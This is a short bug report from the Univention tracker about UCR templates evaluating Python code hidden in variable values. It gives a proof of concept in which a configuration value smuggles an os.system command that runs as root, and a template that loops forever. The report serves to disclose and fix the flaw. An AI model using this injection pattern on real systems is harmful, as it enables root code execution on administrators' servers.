Univention Bugzilla – Bug 49853
UCR variables printed via @%@ execute python code
Last modified: 2019-07-16 11:44:34 CEST
If a UCR template contains @%@foo@%@ the UCR variable "foo" might contain @!@...@!@ which would then be evaluated as python code. Example: # ucr set ldap/debug/level='@!@import os; os.system("id >> /tmp/executed");@!@' Setting ldap/debug/level Multifile: /etc/ldap/slapd.conf # cat /tmp/executed uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) uid=0(root) gid=0(root) Gruppen=0(root) The same applies for Code inside of @!@ which prints @!@-code. Here is code which causes an endless loop: # echo '@!@print(open('foo.tpl').read())@!@' > foo.tpl # ucr filter < foo.tpl … runs forever… I think this is 1. bad and unexpected behavior 2. a potential security risk as ucr_filter() is e.g. used elsewhere, too (e.g. in the appcenter without UCR variables)